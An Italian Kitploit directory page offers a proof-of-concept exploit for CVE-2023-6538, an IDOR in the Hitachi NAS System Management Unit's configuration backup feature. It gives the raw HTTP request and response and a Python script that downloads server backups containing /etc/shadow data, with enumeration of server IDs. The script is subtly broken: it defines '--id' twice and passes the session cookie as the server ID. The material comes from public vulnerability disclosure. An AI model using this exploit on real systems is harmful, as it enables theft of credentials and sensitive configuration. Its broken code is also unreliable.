Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/arszilla/cve-2023-6538
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubarszilla/cve-2023-6538

CVE-2023-6538

Exploit proof-of-concept per CVE-2023-6538, una vulnerabilità IDOR in Hitachi NAS System Management Unit che consente a utenti non privilegiati di scaricare configurazioni di backup del server contenenti dati sensibili.

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
CVE-2023-6538 — Exploit proof-of-concept per CVE-2023-6538, una vulnerabilità IDOR in Hitachi NAS System Management Unit che consente a utenti non privilegiati di scaricare configurazioni di backup del server contenenti dati sensibili. | Kitploit

CVE-2023-6538

CVE-2023-6538 è un Insecure Direct Object Reference (IDOR) nella vulnerabilità presente nella funzionalità Configuration Backup & Restore di System Management Unit (SMU) di Hitachi NAS (HNAS). Questa vulnerabilità interessa le versioni di SMU precedenti alla 14.8.7825.01.

Sfruttamento

Questo exploit richiede che l'attaccante abbia il controllo delle credenziali di un account utente che non sia Read-Only o Global Administrator, ovvero:

  • Storage Administrator
  • Server Administrator
  • Server + Storage Administrator

Per progettazione, gli utenti con il ruolo Global Administrator dovrebbero poter accedere alla funzionalità Configuration Backup & Restore di SMU, situata all'indirizzo https://<HOSTNAME/FQDN/IP>/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 e inviare la seguente richiesta, che creerebbe e scaricherebbe il backup della configurazione del server selezionato (cioè un server connesso al SMU):

root@kitploit:~
GET /mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Se la richiesta ha successo, il SMU risponde con la seguente risposta e avvia il download di registry_data.tgz:

root@kitploit:~
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=registry_data.tgz
Content-Type: application/download
Content-Length: 3169247
Date: Fri, 14 Apr 2023 09:30:03 GMT
Connection: close
Server: SMU

[DATA]

Tuttavia, a causa di una svista nella logica di business di SMU, un attaccante con accesso a un account Storage Administrator, Server Administrator o Server + Storage Administrator può aggiornare i cookie JSESSIONID e JSESSIONIDSSO per farli corrispondere a quelli dell'utente di cui è in possesso, consentendogli di scaricare l'archivio di configurazione. Inoltre, l'attaccante può anche aggiornare il parametro serverid nella richiesta per enumerare e scaricare l'archivio di configurazione di diversi server connessi al SMU.

Pertanto, uno script come CVE-2023-6538.py potrebbe essere utilizzato per sfruttare questa vulnerabilità:

root@kitploit:~
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Configuration Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-6538
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04     

import argparse
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-6538 PoC",
    usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="Server ID value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso, serverid):
    # Set the filename:
    filename = "registry_data.tgz"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso, args.id)

La giustificazione del punteggio CVSS v3.1 di 7.6 può essere ulteriormente compresa esaminando registry_data.tgz:

root@kitploit:~
$ tree -a
.
├── backup.properties
├── registry5.11.db1
├── registry5.13.db1
├── registry5.14.db1
├── registry5.15.db1
├── registry5.1.db1
├── registry5.2.db1
├── registry5.3.db1
├── registry5.4.db1
├── registry5.5.db1
├── registry5.6.db1
├── registry5.7.db1
├── registry5.8.db1
└── registry5.db1

1 directory, 14 files

L'archivio .tgz contiene varie impostazioni e informazioni sul server connesso al SMU:

registry5

Come si vede nell'immagine oscurata sopra, registry5.db1 contiene i contenuti di /etc/shadow (trovato tramite regex) del server selezionato.

Note

Questa vulnerabilità è una "vulnerabilità sorella" di CVE-2023-5808.

Riferimenti

  • CVE-2023-5808
  • CVE-2023-6538
  • Hitachi Vantara Security Bulletin per CVE-2023-6538

Cronologia

  • 2020-04-12 - Vulnerabilità scoperta
  • 2023-04-20 - Vulnerabilità segnalata a [email protected]
  • 2023-08-11 - Assegnazione iniziale del numero CVE
  • 2023-12-06 - Numeri CVE riassegnati
  • 2023-12-11 - Numeri CVE riassegnati
  • 2023-12-11 - CVE pubblicato
  • 2023-12-13 - Divulgazione pubblica
Scarica lo strumento